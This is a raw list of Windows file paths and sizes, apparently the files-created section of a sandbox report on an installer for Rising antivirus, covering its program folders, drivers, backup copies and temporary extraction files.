%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogDc.bmp (24 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsndisp.sys (10 bytes)
%Program Files%\Rising\RAV\rav936\lics936.txt (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bacore.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rscom.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\CfgDll.dll (1425 bytes)
%Program Files%\Rising\RAV\rscurl.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon_if.dll (64 bytes)
%Program Files%\Rising\RSD\rsmginfo.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.CRT.manifest (496 bytes)
%Program Files%\Rising\RAV\msvcr90.dll (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\localopt.dll (605 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rscombas.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\url.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.xml (404 bytes)
%Program Files%\Rising\RAV\cfgxml\adefmon.mond (2 bytes)
%Program Files%\Rising\RAV\desktop.ini (182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.dll (3179 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\chs.lag (7 bytes)
%Program Files%\Rising\RAV\cloudqry.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon.sys (1604 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\antipromotionmon.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscomm.xml (2 bytes)
%Program Files%\Rising\RSD\updater.exe (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mondcoms.xml (8 bytes)
%Program Files%\Rising\RAV\Label.dat (140 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dat (22 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3w.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rscurl.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsPcVer12.xml.rs (667 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\RSDK.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD1252\Eng.lag (52 bytes)
%Program Files%\Rising\RSD\RsStub.exe (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rspalvd.dll (336 bytes)
%Program Files%\Rising\RSD\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccom.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\Cloudv3.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\procenv.dll (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mond.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\moncomm.dll (673 bytes)
%Program Files%\Rising\RAV\RsTray.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogAc.bmp (24 bytes)
%Program Files%\Rising\RAV\RsSmall.bmp (576 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsAppMgr.dll (64 bytes)
%Program Files%\Rising\RAV\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudwork.dll (11830 bytes)
%Program Files%\Rising\RAV\cfgxml\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudstore.dll (2321 bytes)
%Program Files%\Rising\RAV\cfgxml\mond.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\mondrv.dll (3073 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\rsuser.db1 (601 bytes)
%Program Files%\Rising\RAV\XMLS\RSDK.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsuser.db1 (71 bytes)
%Program Files%\Rising\RAV\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsMain.ico (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rssrv.dll (114 bytes)
%Program Files%\Rising\RAV\cnt08.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\RAVMAINDUI.xml (1 bytes)
%Program Files%\Rising\RSD\RSD936\CHS.lag (28 bytes)
%System%\drivers\rsutils.sys (601 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsBackup.exe (2105 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcr90.dll (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rscombas.dll (435 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.rstray (293 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\LICENSE.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD1252\Eng.lag (52 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudnet.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mond.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\popwndexe.exe (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3a.dll (1898 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\MONBASEDUI.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\mergexml.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard_if.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\comx3.dll (709 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\localopt.dll (2613 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsdk.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RstoreDll.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mondcoms.xml (8 bytes)
%Program Files%\Rising\RAV\RavSetup.dll (7433 bytes)
%Program Files%\Rising\RAV\cfgxml\repairmanager.mond (207 bytes)
%Program Files%\Rising\RAV\CompsVer.inf (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard.sys (601 bytes)
%Program Files%\Rising\RAV\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsmginfo.dll (2105 bytes)
%Program Files%\Rising\RAV\XMLS\MONBASEDUI.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsmon.dat (45 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rstask.xml (4 bytes)
%Program Files%\Rising\RAV\procenv.dll (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsmon.db1 (43 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RAV\mergexml.dll (601 bytes)
%Program Files%\Rising\RAV\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\rscfg.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsMgrSvc.exe (1855 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\monbasedui.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RstoreDll.dll (2352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\url.ini (4 bytes)
%Program Files%\Rising\RAV\Rising.ico (3 bytes)
%Program Files%\Rising\RAV\url.ini (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\hookbase.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravconfig.xml (518 bytes)
%Program Files%\Rising\RAV\rssrv.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CompsVer.inf (2 bytes)
%Program Files%\Rising\RAV\XMLS\RAVDEFDB.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogAc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\urg[1].htm (168 bytes)
%Program Files%\Rising\RSD\rslang.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rslang.dll (673 bytes)
%Program Files%\Rising\RAV\cfgxml\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\mscrt9.xml (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\chs.lag (7 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\ravxp.exe (601 bytes)
%Program Files%\Rising\RAV\Cloudv3.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dat (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\mergexml.dll (117 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\rslog.dll (106 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rslang.dll (935 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rspalvd.dll (1281 bytes)
%Program Files%\Rising\RSD\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (48 bytes)
%Program Files%\Rising\RAV\LogDc.bmp (24 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\moncom08.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rssqlite.dll (2550 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\rsmon.db (43 bytes)
%Program Files%\Rising\RAV\rscommx2.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\atl90.dll (1254 bytes)
%Program Files%\Rising\RAV\cloudsta.dll (63 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\setup.dat (601 bytes)
%System%\drivers\protreg.sys (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mond (207 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\syslay.dll (1248 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\updater.exe (7115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\ravmaindui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcp90.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CompsVer.inf (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\ravlog.xml (545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WSS96LYK\urg[1].htm (56 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils.sys (601 bytes)
%Program Files%\Rising\RAV\rscom.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\protreg.sys (24 bytes)
%Program Files%\Rising\RAV\XMLS\RAVLOG.xml (545 bytes)
%Program Files%\Rising\RAV\cfgxml\userdata.rstray (293 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccomm.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\defmon.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\pngdll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\syslay.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RavSetup.dll (4295 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdk.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.mond (485 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3a.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\setup.dat (601 bytes)
%Program Files%\Rising\RAV\ravmond.exe (1425 bytes)
%Program Files%\Rising\RAV\sysmon_if.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\_RAV.xml (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mondcoms (232 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\x64\adefmon.mond (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsSmall.bmp (576 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\sysmon.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\procenv.dll (29 bytes)
%Program Files%\Rising\RAV\XMLS\RSMONDEF.xml (1 bytes)
%Program Files%\Rising\RAV\rsnscfg.dat (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsndisp.sys (11 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\RSCFG.xml (996 bytes)
%Program Files%\Rising\RAV\moncom08.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RSCOMM.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.xml (1 bytes)
%Program Files%\Rising\RAV\rsmain.exe (601 bytes)
%Program Files%\Rising\RAV\rssqlite.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudnotifier.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.dll (787 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\syslay.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\antipromotionmon.dll (432 bytes)
%Program Files%\Rising\RAV\XMLS\LICENSE.xml (347 bytes)
%Program Files%\Rising\RSD\Backup\RAV\Label.dat (140 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravcfg.xml (126 bytes)
%Program Files%\Rising\RAV\rsdll.dll.dat (601 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsmon.db1 (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\sysmon.sys (1076 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsMgrSvc.exe (673 bytes)
%Program Files%\Rising\RAV\XMLS\RAVCONFIG.xml (518 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\datastorage.db (19 bytes)
%Program Files%\Rising\RAV\rsxml3w.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsSmall.bmp (576 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\RsPcVer12[1].xml (663 bytes)
%Program Files%\Rising\RAV\XMLS\MSCRT9.xml (961 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\dataups.dat (207 bytes)
%Program Files%\Rising\RAV\antipromotionmon.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rssqlite.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAV.ico (601 bytes)
%Program Files%\Rising\RAV\rslog.dll (601 bytes)
%Program Files%\Rising\RAV\Proccom.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudqry.dll (2105 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\RAVCONFIG.xml (518 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudsta.dll (63 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Rising.ico (3 bytes)
%Program Files%\Rising\RAV\dfw.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\defmon.dll (3386 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmginfo.dll (3891 bytes)
%Program Files%\Rising\RAV\rspalvd.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.rstray (293 bytes)
%Program Files%\Rising\RAV\selfmon.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\moncomm.dll (165 bytes)
%Program Files%\Rising\RAV\XMLS\RSCOMM.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscommx2.dll (1411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard.sys (634 bytes)
%Program Files%\Rising\RAV\XMLS\HOOKBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD932\Jpn.lag (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3w.dll (248 bytes)
%Program Files%\Rising\RAV\bacore.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\_rav.xml (368 bytes)
%Program Files%\Rising\RAV\XMLS\RAVMON.xml (574 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAVBASE.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.mond (485 bytes)
%Program Files%\Rising\RAV\rscfg.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.exe (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\selfmon.dll (89 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\12345678.000 (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg.tmp (1960 bytes)
%Program Files%\Rising\RSD\syslay.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dll (3859 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudv3.xml (1 bytes)
%Program Files%\Rising\RAV\LogAc.bmp (24 bytes)
%Program Files%\Rising\RSD\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt09.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\Cloudv3.dll (4727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\comx3.dll (693 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.dll (38 bytes)
%Program Files%\Rising\RAV\dataups.dat (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsutils.sys (985 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\monrule.dll (1153 bytes)
%Program Files%\Rising\RAV\XMLS\RAVMAINDUI.xml (1 bytes)
%Program Files%\Rising\RAV\XMLS\CLOUDQRY.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rscurl.dll (3926 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudnet.dll (2054 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\protreg.sys (24 bytes)
%Program Files%\Rising\RAV\msvcp90.dll (3361 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Rising Software Deployment System\.lnk (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\selfmon.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rstask.xml (4 bytes)
%Program Files%\Rising\RAV\monrule.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsStub.exe (1762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSSETUP.xml (6 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudwork.dll (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\datastorage.db (19 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\setup.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\c[1].aspx (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\update.xml (164 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\ShortCut\RAV.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RAV\mondef.dll (3361 bytes)
%Program Files%\Rising\RSD\RsAppMgr.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rscommx2.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bacore.dll (5060 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcr90.dll (7805 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.exe (817 bytes)
%Program Files%\Rising\RSD\update.xml (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\setup.dat (126 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\rsmon.db1 (43 bytes)
%Program Files%\Rising\RAV\cnt09.dll (1281 bytes)
%Program Files%\Rising\RSD\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RAV.ico (81 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard_if.dll (459 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\syslay.dll (26 bytes)
%Program Files%\Rising\RAV\localopt.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\MSCRT9.xml (961 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\language.ini (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon_if.dll (1803 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.ATL.manifest (466 bytes)
%Program Files%\Rising\RAV\cloudnotifier.dll (1425 bytes)
%Program Files%\Rising\RAV\traywnd.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk.dll (6045 bytes)
%Program Files%\Rising\RSD\localopt.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dat (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudstore.dll (2897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsndisp.sys (10 bytes)
%Program Files%\Rising\RAV\kguard_if.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\dataups.dat (207 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD950\CHT.lag (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Auto.ini (36 bytes)
%Program Files%\Rising\RSD\RSD1252\Eng.lag (52 bytes)
%Program Files%\Rising\RSD\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcp90.dll (5724 bytes)
%Program Files%\Rising\RSD\CfgDll.dll (1425 bytes)
%Program Files%\Rising\RAV\rsxml3a.dll (673 bytes)
%System%\drivers\rsndisp.sys (10 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsutils.sys (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsMain.ico (27 bytes)
%Program Files%\Rising\RAV\rstasku.xml (4 bytes)
%Program Files%\Rising\RAV\XMLS\_RAV.xml (368 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rsnscfg.dat (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\mondef.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dll (1069 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\RAV.ini (599 bytes)
%Program Files%\RsTest.ini (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\dfw.dll (3888 bytes)
%Program Files%\Rising\RAV\syslay.dll (26 bytes)
%Program Files%\Rising\RAV\RsBaseNetWrapper.dll (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\ravmond.exe (1990 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\ravcfg.xml (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Repair.url (155 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\ravcfg.xml (601 bytes)
%Program Files%\Rising\RSD\popwndexe.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RAV\rav936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.xml (4 bytes)
%System%\drivers\kguard.sys (601 bytes)
%Program Files%\Rising\RAV\mondrv.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rsnscfg.dat (2 bytes)
%Program Files%\Rising\RSD\RstoreDll.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\rav936.xml (515 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\adefmon.mond (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon.sys (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\RAVLOG.xml (545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\lics936.txt (8 bytes)
%Program Files%\Rising\RSD\XMLS\RSSetup.xml (6 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\CLOUDV3.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\atl90.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccom.dll (1039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Setup.exe (8063 bytes)
